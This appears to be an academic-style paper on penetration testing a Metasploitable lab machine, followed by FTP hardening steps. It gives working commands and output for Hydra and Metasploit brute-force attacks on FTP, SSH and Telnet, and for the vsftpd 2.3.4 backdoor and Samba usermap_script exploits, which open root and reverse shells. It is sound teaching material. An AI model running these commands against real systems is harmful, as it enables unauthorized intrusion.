

Exploitation of Different Network Services Using Metasploit Framework

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Abstract— This paper gives an overview of the methodology of penetration testing and the tools used. This authorized attempt to evaluate the security of a network or an infrastructure by safely attempting to exploit the vulnerabilities helps in finding the loopholes in the network. These loopholes may allow an attacker to intrude and exploit the vulnerabilities. Penetration tests can have serious consequences for the network on which they are run. If it is being badly conducted it can cause congestion and systems crashing. In the worst-case scenario, it can result in exactly the thing it is intended to prevent. The exploitation of different network services, this authorized attempt to evaluate the security of a network or an infrastructure by safely attempting to exploit the vulnerabilities helps in finding the loopholes in the network. These loopholes may allow an attacker to intrude and exploit the vulnerabilities. Penetration testing is a well-known method for actively evaluating and assessing the security of a network or an information system by simulating an attack from an attacker's perspective. A penetration tester must necessarily follow a certain methodology so as to successfully identify the threats faced by an organization's network or information assets from a hacker and reduce an organization's IT security costs by providing a better return on security investments..

Keywords— Network Security, Exploitation, Network Services, Metasploit

I. INTRODUCTION

Penetration testing is a well-known method for actively evaluating and assessing the security of a network or an information system by simulating an attack from an attacker's perspective. A penetration tester must necessarily follow a certain methodology so as to successfully identify the threats faced by an organization's network or information assets from a hacker and reduce an organization's IT security

costs by providing a better return on security investments. This paper gives an overview of the methodology of penetration testing and the tools used. This authorized attempt to evaluate the security of a network or an infrastructure by safely attempting to exploit the vulnerabilities helps in finding the loopholes in the network. These loopholes may allow an attacker to intrude and exploit the vulnerabilities. Penetration tests can have serious consequences for the network on which they are run. If it is being badly conducted it can cause congestion and systems crashing. In the worst-case scenario, it can result in exactly the thing it is intended to prevent. This is the compromise of the systems by unauthorized intruders. It is therefore vital to have consent from the management of an organization before conducting a penetration test on its systems or network.

A. Scope of Study

Identifying gaps in security: Organization can identify the gap in the system security and the company can develop an action plan to reduce the threat with the help of a penetration test.

- Help to create a strong business case: A penetration test result document will help the manager to create a strong business case to produce the security message at the implementation stage.
- To discover new threats: Penetration testing measures will help the organization to find the new threats.
- To focus on internal security resources: A Penetration test and its security analysis allow the organization to focus on internal security resources.
- To meet regulatory compliances: Organization can meet their regulatory compliances using penetration testing tools.
- To find the weakest link: Penetration test and security audit will assist the firm to find the weakest link in their intricate structure and it will provide baseline security for all typical entities.

Provide validation feedback: Penetration tests deliver validation feedback to business entities and security

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frameworks that lead the organization to reduce the risk in the implementation.

II. IMPLEMENTATION DETAILS

A. File Transfer Protocol (FTP)

FTP means "File Transfer Protocol" and refers to a group of rules that govern how computers transfer files from one system to another over the internet. Businesses use FTP to send files between computers, while websites use FTP for the uploading and downloading of files from their website's servers.

B. Working of FTP

FTP works by opening two connections that link the computers trying to communicate with each other. One connection is designated for the commands and replies that get sent between the two clients, and the other channel handles the transfer of data. During an FTP transmission, there are four commands used by the computers, servers, or proxy servers that are communicating. These are 'send', 'get', 'change directory', and 'transfer'.

While transferring files, FTP uses three different modes: block, stream, and compressed. The stream mode enables FTP to manage information in a string of data without any boundaries between them. The three most common ways of using FTP include:

1. Via a web browser: With a web browser, you do not need any special software or a client to download files from servers that provide FTP sites.
2. A general user interface (GUI) FTP client: These third-party applications enable users to connect and then send files over FTP.
3. Command-line FTP: Major operating systems come equipped with FTP client capabilities as a command line.

C. Steps of Configuration

1.1 Install Metasploitable

1.2 Install Kali

1.2.1 Scan the Enterprise Network with Nmap
 nmap -p- -sV 192.168.1.102

1.2.2 Exploiting Port 21 FTP (Hydra)

hydra -L user.txt -P pass.txt 192.168.1.102 ftp

```
msf5:~# hydra -L user.txt -P pass.txt 192.168.1.102 ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-28 00:49:41
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (1:7/p:7), -4 tries per task
[DATA] attacking ftp://192.168.1.102:21/
[*][*][*] host: 192.168.1.102 login: msfadmin password: msfadmin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-28 00:50:03
msf5:~#
```

Figure 1: Brute force using Hydra

1.2.3 Exploiting VSFTPD 2.3.4 searchsploit vsftpd 2.3.4

```
msf5:~# searchsploit vsftpd 2.3.4
.....
Exploit Title | Path
-----|-----
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
.....
Shellcodes: No Result
msf5:~#
```

Figure 2: Exploit for vsftpd 2.3.4

```
msf5console
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor

msf5 exploit (unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 exploit (unix/ftp/vsftpd_234_backdoor) > exploit
```

```
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit (unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 exploit (unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
-----
Name Current Setting Required Description
-----
RHOSTS 192.168.1.102 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:pathe'
RPORT 21 yes The target port (TCP)

Exploit target:
-----
Id Name
-- ----
0 Automatic

msf5 exploit (unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.1.102:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.102:21 - USER: 331 Please specify the password.
[*] 192.168.1.102:21 - Backdoor service has been spawned, handling...
[*] 192.168.1.102:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.105:41577 -> 192.168.1.102:6200) at 2020-01-28 00:58:21 +0530

id
uid=0(root) gid=0(root)
whoami
root
```

Figure 3: Exploiting vsftpd 2.3.4

1.2.4 Exploiting Port 22 SSH (Bruteforce)

```
msf5console
msf5 > use auxiliary/scanner/ssh/ssh_login

msf5 auxiliary (scanner/ssh/ssh_login) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 auxiliary (scanner/ssh/ssh_login) > set user_file /root/user.txt
user_file => /root/user.txt
msf5 auxiliary
```

(scanner/ssh/ssh_login) > set pass_file /root/pass.txt
 msf5 auxiliary (scanner/ssh/ssh_login) > exploit

```
msf5 >
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 auxiliary(scanner/ssh/ssh_login) > set user_file /root/user.txt
user_file => /root/user.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/pass.txt
pass_file => /root/pass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > exploit

[*] 192.168.1.102:22 - Success: 'msfadmin:msfadmin' ''
[*] Command shell session 1 opened (192.168.1.105:34215 -> 192.168.1.102:22) at 2020-01-28 01:11:03 +0530
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > []
```

Figure 4: Exploiting SSH

1.2.5 Exploiting TELNET (Bruteforce)

msfconsole

msf5 > use auxiliary/scanner/telnet/telnet_login
 msf5 auxiliary (scanner/telnet/telnet_login) > set rhosts 192.168.1.102
 msf5 auxiliary (scanner/telnet/telnet_login) > set user_file /root/user.txt
 msf5 auxiliary (scanner/telnet/telnet_login) > set pass_file /root/pass.txt
 msf5 auxiliary (scanner/telnet/telnet_login) > set stop_on_success true
 msf5 auxiliary (scanner/telnet/telnet_login) > exploit

```
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 auxiliary(scanner/telnet/telnet_login) > set user_file /root/user.txt
user_file => /root/user.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set pass_file /root/pass.txt
pass_file => /root/pass.txt
msf5 auxiliary(scanner/telnet/telnet_login) > exploit

[*] 192.168.1.102:23 - No active DB -- Credential data will not be saved!
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: password:password (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: password:querty (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: password:msfadmin (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: password:tomcat (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: password:ftuser (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: password:root (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: password:shuhari (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: querty:password (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: querty:querty (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: querty:msfadmin (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: querty:tomcat (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: querty:ftuser (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: querty:root (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: querty:shuhari (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: msfadmin:password (Incorrect: )
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: msfadmin:querty (Incorrect: )
[*] 192.168.1.102:23 - 192.168.1.102:23 - Login Successful: msfadmin:msfadmin
192.168.1.102:23 - Attempting to start session 192.168.1.102:23 with msfadmin:msfadmin
[*] Command shell session 1 opened (192.168.1.105:33775 -> 192.168.1.102:23) at 2020-01-28 01:16:52 +0530
192.168.1.102:23 - 192.168.1.102:23 - LOGIN FAILED: tomcat:password (Incorrect: )
```

Figure 5: Exploiting Telnet

1.1.1 Exploiting Port 139 & 445 (Samba)

msfconsole

msf5 > use exploit/multi/samba/usermap_script
 msf5 exploit (multi/samba/usermap_script) > set rhosts 192.168.1.102
 msf5 exploit (multi/samba/usermap_script) > exploit

```
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set rhosts 192.168.1.102
rhosts => 192.168.1.102
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.1.105:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo rjbmXgNHL4w3oa;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "rjbmXgNHL4w3oa\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.105:4444 -> 192.168.1.102:50477) at 2020-01-28 01:25:20 +0530

id
uid=0(root) gid=0(root)
whoami
root
```

Figure 6: Exploiting Samba

1.2.7 Exploiting Port 3306 (MYSQL)

mysql -u root -h 192.168.1.102 -p

```
root@kali:~# mysql -u root -h 192.168.1.102 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> []
```

Figure 7: Exploiting MySQL

1.3 Install New Server machine

1.3.1 Installation of FTP

apt-get install vsftpd

```
root@kali:~# apt-get install vsftpd
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
libevent-2.1-6 liblog4c2
Use 'apt autoremove' to remove them.
The following NEW packages will be installed:
vsftpd
0 upgraded, 1 newly installed, 0 to remove and 157 not upgraded.
Need to get 153 kB of archives.
After this operation, 358 kB of additional disk space will be used.
Get:1 http://ftp.hurkasan.org/kali kali-rolling/main amd64 vsftpd amd64 3.0.3-12+b1 [153 kB]
Fetched 153 kB in 0s (26.6 kB/s)
Preconfiguring packages ...
Selecting previously unselected package vsftpd.
(Reading database ... 333966 files and directories currently installed.)
Preparing to unpack .../vsftpd_3.0.3-12+b1_amd64.deb ...
Unpacking vsftpd (3.0.3-12+b1) ...
Setting up vsftpd (3.0.3-12+b1) ...
vsftpd.conf:1: Line references path below legacy directory /var/run/, updating /var/run/vsftpd/empty -> /run/vsftpd/empty; please update the files in /etc/vsftpd/ accordingly.
update-rc.d: We have no instructions for the vsftpd init script.
update-rc.d: It looks like a network service, we disable it.
Processing triggers for systemd (244-3) ...
Processing triggers for man-db (2.9.8-2) ...
Processing triggers for kali-menu (2020.1.7) ...
debconf: #
```

Figure 8: Installation of FTP

Once FTP is installed use nmap to confirm and to do so, type the following command: nmap -sV -p21 192.168.1.108

```

root@kali:~# nmap -sV -p21 192.168.1.108
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-29 02:00 IST
Nmap scan report for 192.168.1.108
Host is up (0.000030s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp      vsftpd 3.0.3
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
root@kali:~#

```

Figure 9: Nmap scan of port 21

1.3.2 Anonymous Login

nano /etc/vsftpd.conf “anonymous_enable=NO”

```

GNU nano 4.5 /etc/vsftpd.conf
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=YES
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=NO
#
# Uncomment this to allow local users to log in.
local_enable=YES

```

Figure 10: Anonymous Login

1.3.3 Disable FTP_banner

In the conf file found the statement “ftpd_banner=welcome to blah FTP service”. From this statement remove the # symbol as shown in the image below:

```

GNU nano 4.5 /etc/vsftpd.conf
# You may fully customise the login banner string:
ftpd_banner=Welcome to blah FTP service.
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES

```

Figure 11: Disable FTP banner

Now if you again scan from nmap it will hide the banner. Try it by using the following command:
nmap -sV -p21 192.168.1.108

```

root@kali:~# nmap -sV -p21 192.168.1.108
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-29 02:01 IST
Nmap scan report for 192.168.1.108
Host is up (0.000035s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp      vsftpd
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds
root@kali:~#

```

Figure 12: Nmap of port 21

1.3.4 Switch Port for FTP Service

Like this, you can add another security layer by changing the port of ftp. You can start the service of ftp on any port you like. Here, we have shifted the FTP port to 5000.

```

GNU nano 4.5 /etc/vsftpd.conf
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=NO
listen_port=5000

```

Figure 13: Switch Port

```

root@kali:~# nmap -sV -p5000 192.168.1.108
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-29 02:03 IST
Nmap scan report for 192.168.1.108
Host is up (0.000054s latency).

PORT      STATE SERVICE VERSION
5000/tcp  open  ftp      vsftpd
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
root@kali:~#

```

Figure 14: Nmap of port 5000

1.3.5 Sniffing FTP Login credential

By default, the traffic sent to and received from FTP is not encrypted. An attacker can take the help of sniffing tools to sniff the data packet traveling between server and client in a network and retrieve credentials. And then use them for unauthorized access. FTP users may authenticate themselves with a clear-text sign-in protocol for username and password.

Similarly, if we capture TCP packets through Wireshark for sniffing FTP credentials. So, now try and log in to FTP using the following commands:

FTP 192.168.1.108 5000

D. Give the Username And Password

Capture the traffic using Wireshark. Now, in Wireshark, if you follow the TCP stream of the packet, you can see the login credentials in clear text as shown in the following image:

Figure 15: Sniffing ftp username

Figure 16: Sniffing ftp password

1.3.6 Use SSL Certificate against Sniffing

Let's add another security layer for the problem generated above. The solution for this is to create an SSL certificate. SSL stands for Secure Sockets Layer, the protocol that provides secure, encrypted communications between server and client, this encrypted data packet traveling between server-client networks.

Although an attacker can sniff network data packets or will be not able to read fetched information because the entire data will show in the form of ciphertext.

Here administrations need to generate their own SSL certificate for secure authentication. Make the directory where the SSL certificate keys will be stored.

Use the following command to create a certificate:

```
openssl req -x509 -nodes -days 365 -newkey
rsa:2048 -keyout
/etc/ssl/private/vsftpd.pem -out /etc/ssl/private/vsftpd.pem
```


Figure 17: Create SSL Certificate

Once the above command is executed, open vsftpd.conf file for changing default setting by adding a few lines at the end of the file. Following are the lines to be added:

```
rsa_cert_file=/etc/ssl/private/vsftpd.pem
rsa_private_key_file=/etc/ssl/private/vsftpd.pem
ssl_enable=YES allow_anon_ssl=NO
force_local_data_ssl=YES force_local_logins_ssl=YES
ssl_tlsv1=YES ssl_sslv2=NO
ssl_sslv3=NO require_ssl_reuse=NO ssl_ciphers=HIGH
```


Figure 18: Configure SSL Certificate

Now let's ensure whether we can connect to the FTP server. Protocol to: FTP Encryption To: TSL/SSL Explicit encryption Hostname: IP of the FTP Server Port: 5000 Username and Password: ftpuser : ftpuser

Figure 19: Login with SSL Certificate

Now the server will send the certificate to an authorized user click on yes to store the certificate and continue the encrypted connecting.

Figure 20: Certificate

Now, when you will establish the connection of FTP as shown in the image below:

Figure 21: FTP Server GUI

All the traffic that is sent and received is encrypted which you can check through Wireshark. It has also shown below:

Figure 22: Sniffing FTP credentials

Figure 23: Sniffing FTP credentials

1.3.7 Stop FTP Bruteforce Attack with Fail2ban

Using hydra we have logged-in credentials and so are a brute force attack is successful. But we can protect our FTP server and important files. To be secure against brute force, you can use the fail2ban tool

Figure 24: Bruteforce Blocking

1.3.8 Restrict IP to Connect FTP

Another security layer that you can apply is blocking all other IPs and allowing your trusted ones. Now open hosts.allow file from inside /etc to allow the valid user to connect with the server securely through specific IP. At the end of the text file enter the specific IP to whom you want to give permission for establishing a connection as shown in the given image.


```

root@kali: ~
GNU nano 4.5 /etc/hosts.allow
# /etc/hosts.allow: list of hosts that are allowed to access the system.
# See the manual pages hosts_access(5) and hosts_options(5).
#
# Example: ALL: LOCAL @some_netgroup
#          ALL: .foobar.edu EXCEPT terminalserver.foobar.edu
#
# If you're going to protect the portmapper use the name "rpcbind" for the
# daemon name. See rpcbind(8) and rpc.mountd(8) for further information.
#
vsftpd: 192.168.1.107
  
```

Figure 25: FTP allowed IP

It is quite important that admin should restrict all IPs other than allowed IP (192.168.0.107) to protect the network from establishing connect from unknown IP. Open /etc/hosts.deny and specify a list of hosts whom you want don't to allow access into the system.


```

root@kali: ~
GNU nano 4.5 /etc/hosts.deny
# If you're going to protect the portmapper use the name "rpcbind" for the
# daemon name. See rpcbind(8) and rpc.mountd(8) for further information.
#
# The PARANOID wildcard matches any host whose name does not match its
# address.
#
# You may wish to enable this to ensure any programs that don't
# validate looked up hostnames still leave understandable logs. In past
# versions of Debian this has been the default.
# ALL: PARANOID
#
vsftpd: all
  
```

Figure 27: FTP blocks IP

It will block other IPs as shown below:

Figure 28: FTP Block IP
CONCLUSION

A network can never be completely secure. A Pen tester should have the knowledge of how a hacker will work to penetrate the network by finding new loopholes and vulnerabilities. There are zero-day attacks that come up every day. The network should be fully patched with the latest OS and the patches for the software installed. A penetration test should be regularly performed. Every quarterly is a recommended duration of time for an ideal pen test. Amidst various constraints such as lack of time and improper definition of the scope of the project, the penetration tester has to carry out the test to the best of efficiency by making use of the tools well. It is better to have small automation scripts for time-consuming tasks.

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